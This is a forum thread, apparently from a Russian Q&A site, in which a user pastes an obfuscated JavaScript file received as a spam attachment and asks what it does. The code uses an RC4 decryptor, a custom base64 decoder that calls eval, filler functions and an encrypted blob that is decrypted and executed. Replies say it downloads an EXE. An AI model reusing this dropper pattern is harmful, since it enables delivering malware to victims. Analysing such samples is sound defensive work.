JS mailing virus?

A

Aizharik2015-07-03 14:12:07

JavaScript

Aizharik, 2015-07-03 14:12:07

JS mailing virus?

Hey! I'm not strong in JS, spam came with a js script. Can you tell me what this script does?

function rc4(key, str) {
    var s = [],
        j = 0,
        x, res = '';
    for (var i = 0; i < 256; i++) {
        s[i] = i;
    }
    for (i = 0; i < 256; i++) {
        j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
    }
    i = 0;
    j = 0;
    for (var y = 0; y < str.length; y++) {
        i = (i + 1) % 256;
        j = (j + s[i]) % 256;
        x = s[i];
        s[i] = s[j];
        s[j] = x;
        res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
    }
    return res;
}
var fn = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

function hoher(owiwu) {
    var ryn = fn + '+' + '/' + '=';
    var qec, acu, udi, ilu, apo, ere, rux, mexyb, f = 0,
        qoq = '';
    do {
        ilu = ryn.indexOf(owiwu.charAt(f++));
        apo = ryn.indexOf(owiwu.charAt(f++));
        ere = ryn.indexOf(owiwu.charAt(f++));
        this['eval']('rux = ryn.indexOf(owiwu.charAt(f++));');
        this['eval']('mexyb = ilu<<18 | apo<<12 | ere<<6 | rux;');
        qec = mexyb >> 16 & 0xff;
        acu = mexyb >> 8 & 0xff;
        udi = mexyb & 0xff;
        if (ere == 64) qoq += String.fromCharCode(qec);
        else if (rux == 64) qoq += String.fromCharCode(qec, acu);
        else qoq += String.fromCharCode(qec, acu, udi);
    } while (f < owiwu.length);
    return qoq;
}
// Дальше идет около 3К таких вот строк кода

function bo26vikigicuko() {
    return hoher('bA==');
};

function bo12vikigicuko() {
    return hoher('dg==');
};

function bo2vikigicuko() {
    return hoher('bA==');
};

function bo13vikigicuko() {
    return hoher('YQ==');
};

function bo14vikigicuko() {
    return hoher('bA==');
};

function bo9vikigicuko() {
    return hoher('cw==');
};

function bo28vikigicuko() {
    return hoher('ag==');
};
// И в конце

var cury;
cury = hoher('asvPczH8cnxpQSxiWvrj/KvvUD38nw0Fm42qqog/7YVId6qcKzyHZr9a5Q5hwhTJC7JyFO2ivOYZuMoe3D8P1vhXnI+PjJryCnT32REO+0iyLR7i+YWvxgbV2ioFVVvbmZumABecxgOJ7hSPoatO62lVuHMMqj3lKWAto29x/Ts3izJysdWte8or9LTOh4/E2nFx+lrCzsbzYMGVeK2z+0O7dGAzAhTXntQ3c6ELqiXMwAcyKXIp8Veajl3wy3WIR3FnwLY61Yion4B+yQwwg8f8GJrozdOpjypHmK/V+0nNfGVxAhqJy3ENHEZ7nJYQBkGnMEMiQFZQyvt2nhBabcfbtvMau57kMjct6bqzQGQGluiFzggA2ma/LpyhK7yecOTzfC/QF9OZ5E+6+ZPe+D+85sPVtVKE3aN9SCj9MDzjoNVFbmmQETsH3eoOwutxaWwwWhIPOigcpCpS/WJOSCGPclLqWtMAivCRFfPVq2SChwXdDjY4jssMBVbKyib51WCvoollE+noCFAV1dkYx/fSI+UvT+8RMurhtUoyMhIWbDLEvm7UNxknCc/Y4Tva+TEWGx/ycAtTE7iHX5eX56ezWTgCI7DHFq/jpkkEWm5wwBygUsm6ufF+6eXl1szyG03PkUnwcFTR05/GQyGGVJR2ybo4pV+dh5kOwQuqlyN1ZGfDP5I5WVm8uySfV44/+/6DBbr6gxyybjXJvBtCe0Dscy3iG6XHm58hg7OeyDcnYa1RChTNM+UyhkF5zC4qGShG/cHnUKWhx/FPZjuv6rMnnDLbxIWo7msDCahuZ7onu6Nmrg9OG7zT1YD9HctY8NJfgQZCEnVKeXG1GupgRLypvloMP3FT6ERRfpsFkg5iZPF6JUxfPMOoHo4IILDxlxmpS6aB5Jri/VTI/2+dJ05ZrW0oCbDFWHw9kWmZHorM0Lc3yRZ7vZNK9Usih5aTY6WqP5c=');
this[ewo](rc4('unit', cury));

Cookie theft?

Reply

Answer the question

In order to leave comments, you need to log in

3 answer(s)

V

Vladimir Martyanov, 2015-07-03
@aizhar777

EXE it downloads.

V

Vladimir Shiklgruber, 2015-07-03
@aaadddminnn

He definitely doesn't steal cookies.

D

DyoMin, 2015-08-05
@DyoMin

Here is something similar, but not the same. There tried to download the file and run it. It's a bit different, but the meaning is the same.